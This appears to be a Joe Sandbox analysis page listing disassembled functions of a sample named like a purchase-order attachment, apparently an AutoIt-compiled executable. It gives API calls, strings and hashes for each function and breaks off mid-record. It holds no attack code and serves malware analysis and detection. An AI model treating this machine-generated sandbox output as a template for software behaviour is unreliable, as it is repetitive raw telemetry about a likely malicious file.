Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
Instruction ID: 76431d1e8bf3edbe85f4478968f4af4cc14dd66677a52f7337c03f4cbddb23bd
Opcode Fuzzy Hash: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
Instruction Fuzzy Hash: 21514C71901709AFDB21EFA9CD85E6EBBB5FF08704F00492DE586A26E0D774A905CB14

Function 0040C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0041E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0040C8B7,?,00002000,?,?,00000000,?,0040419E,?,?,?,0049DC00), ref: 0041E984

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

__wsplitpath.LIBCMT ref: 0040C93E

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscpy.LIBCMT ref: 0040C953
_wcscat.LIBCMT ref: 0040C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0040CABE

Part of subcall function 0040B337: _wcscpy.LIBCMT ref: 0040B36F

Strings

Error opening the file, xrefs: 004730B4, 0047313D
Unterminated string, xrefs: 00473470
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00473098
Bad directive syntax error, xrefs: 00473429
EA06, xrefs: 004730C9
>>>AUTOIT SCRIPT<<<, xrefs: 0047311B
AU3!, xrefs: 0040C90C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 1598bfaf1787faf1a90dafcec1d9463e001162d326762f6d733b4dea320e5d09
Instruction ID: 140721dde5c93db0a4831f506c98d94b1ca13cdcddd4f68ebbd5b188d2806d8f
Opcode Fuzzy Hash: 1598bfaf1787faf1a90dafcec1d9463e001162d326762f6d733b4dea320e5d09
Instruction Fuzzy Hash: C3129171508341DFC724DF25C881AAFBBE5AF98308F40492FF589A3291DB38D949DB5A

Function 0046CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046CEFB
DestroyWindow.USER32(?,?), ref: 0046CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0046CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0046D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D025
DestroyWindow.USER32(?), ref: 0046D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0046D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D094
GetDesktopWindow.USER32 ref: 0046D0A9
GetWindowRect.USER32(00000000), ref: 0046D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0046D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0046D0DA

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

Strings

0, xrefs: 0046CF1B
tooltips_class32, xrefs: 0046CFED, 0046D06E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
Instruction ID: 4dc2e84ce978025e6b17c84472f7ac8ce1a7427ed809a84a7c26ecdd8771ffc4
Opcode Fuzzy Hash: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
Instruction Fuzzy Hash: 6C71BF70A40305AFD720CF28CC85F6A77E5EB89708F14452EF985973A1E738E942CB5A

Function 0046F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DragQueryPoint.SHELL32(?,?), ref: 0046F37A

Part of subcall function 0046D7DE: ClientToScreen.USER32(?,?), ref: 0046D807
Part of subcall function 0046D7DE: GetWindowRect.USER32(?,?), ref: 0046D87D
Part of subcall function 0046D7DE: PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F411
_wcscat.LIBCMT ref: 0046F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0046F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F4AA
DragFinish.SHELL32(?), ref: 0046F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F59C

Strings

@GUI_DRAGID, xrefs: 0046F510
@GUI_DROPID, xrefs: 0046F4D1
@GUI_DRAGFILE, xrefs: 0046F54B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 47b6dc680bd9822ee692f8695d8365c2bfff2efc646ddeb58e66cd6aff652795
Instruction ID: 542b244a70a4be53351f3959c13a29a11e7469c6b76638349d2aa62145188beb
Opcode Fuzzy Hash: 47b6dc680bd9822ee692f8695d8365c2bfff2efc646ddeb58e66cd6aff652795
Instruction Fuzzy Hash: 21613B71508304AFC301EF65DC85E9FBBF8EF89714F000A2EF595A21A1DB759A09CB5A

Function 0044AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0044AB3D
VariantCopy.OLEAUT32(?,?), ref: 0044AB46
VariantClear.OLEAUT32(?), ref: 0044AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0044AC40
__swprintf.LIBCMT ref: 0044AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0044AC9C
VariantInit.OLEAUT32(?), ref: 0044AD4D
SysFreeString.OLEAUT32(00000016), ref: 0044ADDF
VariantClear.OLEAUT32(?), ref: 0044AE35
VariantClear.OLEAUT32(?), ref: 0044AE44
VariantInit.OLEAUT32(00000000), ref: 0044AE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0044AC6A
Default, xrefs: 0044ACFD

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 3ec11bc1e4838f0b829e0c870ea7914dbc6fb1c94dd58f1ac1f1bc445b56f708
Instruction ID: b7343743ca07c40412d491ea83dedac3c5837e075b3f85f41d6defa909029fd8
Opcode Fuzzy Hash: 3ec11bc1e4838f0b829e0c870ea7914dbc6fb1c94dd58f1ac1f1bc445b56f708
Instruction Fuzzy Hash: F7D11671A40205DBEB109F55C885BAEB7B5FF04700F18846BE5059B281DB3CEC66DB9B

Function 0046716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004671FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00467247

Strings

ISCHECKED, xrefs: 004673B2
GETSELECTED, xrefs: 0046733F
GETTOTALCOUNT, xrefs: 0046722A
EXPAND, xrefs: 004672E1
GETTEXT, xrefs: 00467382
COLLAPSE, xrefs: 0046728D
GETITEMCOUNT, xrefs: 00467311
CHECK, xrefs: 00467267
SELECT, xrefs: 004673E0
EXISTS, xrefs: 004672B0
UNCHECK, xrefs: 0046740B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
Instruction ID: 62f23ba057e46a8cd31ddd049ddfa486710c51c13ab62974974121bb26b3cf57
Opcode Fuzzy Hash: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
Instruction Fuzzy Hash: 319156742047019BCB04EF21C851A6EB7A1AF54318F10885FFC9667393EB38ED46DB9A

Function 0043CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0043CF50), ref: 0043CE90

Strings

H+K, xrefs: 0043CCE8
INSTANCE, xrefs: 0043CD9E
T+K, xrefs: 0043CD72
NAME, xrefs: 0043CCC2
TEXT, xrefs: 0043CDC7
CLASSNN, xrefs: 0043CC33
L+K, xrefs: 0043CD14
P+K, xrefs: 0043CD43
CLASS, xrefs: 0043CC10
4+K, xrefs: 0043CC96
REGEXPCLASS, xrefs: 0043CC56

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+K$CLASS$CLASSNN$H+K$INSTANCE$L+K$NAME$P+K$REGEXPCLASS$T+K$TEXT
API String ID: 3555792229-3796589855
Opcode ID: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
Instruction ID: 2ed9d666b05899a5a0bbc8a2e6994f38106217aeede367c2b80ce34893bae7f9
Opcode Fuzzy Hash: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
Instruction Fuzzy Hash: 109176706005069BCB18EF61C4C2BDAFB75BF08304F50952BD859B7291DF38699AD7D8

Function 0046E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0046E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0046BEAF), ref: 0046E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0046BEAF), ref: 0046E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0046E6DF
DestroyIcon.USER32(?,?,?,?,?,0046BEAF), ref: 0046E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0046E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0046E717

Part of subcall function 00420FA7: __wcsicmp_l.LIBCMT ref: 00421030

Strings

.exe, xrefs: 0046E541
.icl, xrefs: 0046E521
.dll, xrefs: 0046E564

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
Instruction ID: 362906a6200e291847826ad6f58851427a409ccbfe03941b9f9efc8c3e9874fa
Opcode Fuzzy Hash: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
Instruction Fuzzy Hash: CC61D171900215FAEB14DF66CC46FBE77E8BB08724F10451BF911E61D1EBB8A980CB68

Function 0044D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CharLowerBuffW.USER32(?,?), ref: 0044D292
GetDriveTypeW.KERNEL32 ref: 0044D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D38C

Strings

type cdaudio alias cd wait, xrefs: 0044D30A
closed, xrefs: 0044D2A6, 0044D2AF
close, xrefs: 0044D298
wait, xrefs: 0044D349
close cd wait, xrefs: 0044D377
open , xrefs: 0044D2EE
set cd door , xrefs: 0044D32D
open, xrefs: 0044D2B9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 8005e5581cf771c0d9af6419e54f0eab00be8d88c1813a4392ffe3500980b3fb
Instruction ID: c2f07575d900e2cc802aa525a9fa0d83b75d0ad0639a96e5e284e948a2682b64
Opcode Fuzzy Hash: 8005e5581cf771c0d9af6419e54f0eab00be8d88c1813a4392ffe3500980b3fb
Instruction Fuzzy Hash: 6F514F715043059FC700EF22D9819AEB7E4FF98718F10896EF88667291DB35EE05CB96

Function 004426BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?), ref: 004426F1
LoadStringW.USER32(00000000,?,00473973,00000016), ref: 004426FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?,00000016), ref: 0044271C
LoadStringW.USER32(00000000,?,00473973,00000016), ref: 0044271F
__swprintf.LIBCMT ref: 0044276F
__swprintf.LIBCMT ref: 00442780
_wprintf.LIBCMT ref: 00442829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00442840

Strings

Line %d (File "%s"):, xrefs: 00442769
Line %d:, xrefs: 0044277A
%s (%d) : ==> %s: %s %s, xrefs: 00442824
^ ERROR, xrefs: 004427D5
Error: , xrefs: 004427F7

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: ddca5aea339f175024a2ecacea153a8960154b9753524d01ccea1f659a7ad99d
Instruction ID: b3eca28f86436021008a970bdb09a16546556c442e301ca44879bea502f66036
Opcode Fuzzy Hash: ddca5aea339f175024a2ecacea153a8960154b9753524d01ccea1f659a7ad99d
Instruction Fuzzy Hash: 96413172800118AADB14FBD2DE86EEF7778AF54344F50017AB501760D2EA786F09CBA8

Function 0044D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0044D0D8
__swprintf.LIBCMT ref: 0044D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0044D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0044D15C
_memset.LIBCMT ref: 0044D17B
_wcsncpy.LIBCMT ref: 0044D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0044D1EC
CloseHandle.KERNEL32(00000000), ref: 0044D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0044D200
CloseHandle.KERNEL32(00000000), ref: 0044D20A

Strings

\??\%s, xrefs: 0044D0F4
:, xrefs: 0044D11B
\, xrefs: 0044D110

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
Instruction ID: b8dacc7318c57a54b8e1dcc07a6608e13ec8875f8ad1fe94d440b818e94b2f45
Opcode Fuzzy Hash: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
Instruction Fuzzy Hash: 1331B871900119ABDB21DFA1DC49FEF77BCEF88740F5040BAF909D11A1E77496458B28

Function 0046E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0046BEF4,?,?), ref: 0046E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E776
CloseHandle.KERNEL32(00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E783
GlobalLock.KERNEL32(00000000), ref: 0046E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E79B
GlobalUnlock.KERNEL32(00000000), ref: 0046E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0048D9BC,?), ref: 0046E7D5
GlobalFree.KERNEL32(00000000), ref: 0046E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 0046E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0046E834
DeleteObject.GDI32(00000000), ref: 0046E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0046E872

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
Instruction ID: bbe379a3d369c15808953ba8d2511d5ef9f42df1505e87a7dc6f0ce051fe7f67
